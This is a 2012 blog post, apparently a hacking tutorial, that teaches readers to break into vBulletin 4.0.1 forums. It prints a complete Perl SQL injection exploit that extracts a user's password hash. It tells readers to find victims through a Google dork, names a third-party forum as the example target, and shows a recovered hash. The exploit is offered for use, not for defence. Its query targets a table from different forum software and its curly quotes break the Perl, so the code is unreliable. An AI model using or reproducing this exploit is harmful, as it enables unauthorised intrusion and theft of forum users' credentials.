Hack vBulletin Version 4.0.1 Forum

Hi Friends My Name Is Yogesh Mehra, And I Gonna Teach You How To Hack vBulletin Vr.4.0.1

1:- Go To Google And Download Active Perl And Install
2:- Click Here To Download Active Perl
3:- Open NotPad And Paste This Code

#!/usr/bin/perl

use IO::Socket;

print q{
################################################## #####################
# vBulletin? Version 4.0.1 Remote SQL Injection Exploit #
# By th3.g4m3_0v3r #
# our Site www.h4ck3r.in #
# www.hackingcrackingtricks.blogspot.com #
# Indian (th3.g4m3_0v3r@yahoo.com) #
# Dork: Powered by vBulletin? Version 4.0.1 #
################################################## #####################
};

if (!$ARGV[2]) {

print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid

perl VB4.0.1.pl www.vb.com /forum/ 1

};

}

$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print “————————————————————————————————\r\n”;
print “[>] SERVER: $server\r\n”;
print “[>] DIR: $dir\r\n”;
print “[>] USERID: $user\r\n”;
print “————————————————————————————————\r\n\r\n”;

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= “misc.php?sub=profile&name=0′)+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= ‘”.$user ;

print “[~] PREPARE TO CONNECT…\r\n”;

$socket = IO::Socket::INET->new( Proto => “tcp”, PeerAddr => “$server”, PeerPort => “80″) || die “[-] CONNECTION FAILED”;

print “[+] CONNECTED\r\n”;
print “[~] SENDING QUERY…\r\n”;
print $socket “GET $path HTTP/1.1\r\n”;
print $socket “Host: $server\r\n”;
print $socket “Accept: */*\r\n”;
print $socket “Connection: close\r\n\r\n”;
print “[+] DONE!\r\n\r\n”;

print “–[ REPORT ]————————————————————————————\r\n”;
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print “Password is: “.$1.”\r\n”;
print “————————————————————————————–\r\n”;

}
exit();
}

}
print “————————————————————————————————\r\n”;

4:- And Save As vb4.pl Dont forget to select Save As Type All Files
5:- then Go To run And Type Cmd Open Your vb4.pl File In Cmd
6:- And Enter
7:- And Your File Look Like This

Code:

C:\Documents and Settings\Administrator\My Documents\My Perl Exploit\vb4.0.1.pl”

8:- Now Go To Google And Type : ” Powered by vBulletin? Version 4.0.1 “
Its A Dork
9:- Select Your Forum
10: Example : You Have A This One http://www.shootfortheedit.com
11: Go To Cmd And type Website

Code:

C:\Documents and Settings\Administrator\My Documents\My Perl Exploit\vb4.0.1.pl” www.shootfortheedit.com /forum/ 1

And Enter

[>] SERVER: http://www.shootfortheedit.com
[>] DIR: /forum/
[>] USERID: 1
——————————————————————————–
—————-

[~] PREPARE TO CONNECT…
[+] CONNECTED
[~] SENDING QUERY…
[+] DONE!

–[ REPORT ]——————————————————————–
—————-
Password is: 801a2e0624793357acbd5bbd8bf434bf
——————————————————————————–––––

Advertisements

About securityforall

it, smile, share for people,...

Posted on June 24, 2012, in All Bug Collection. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: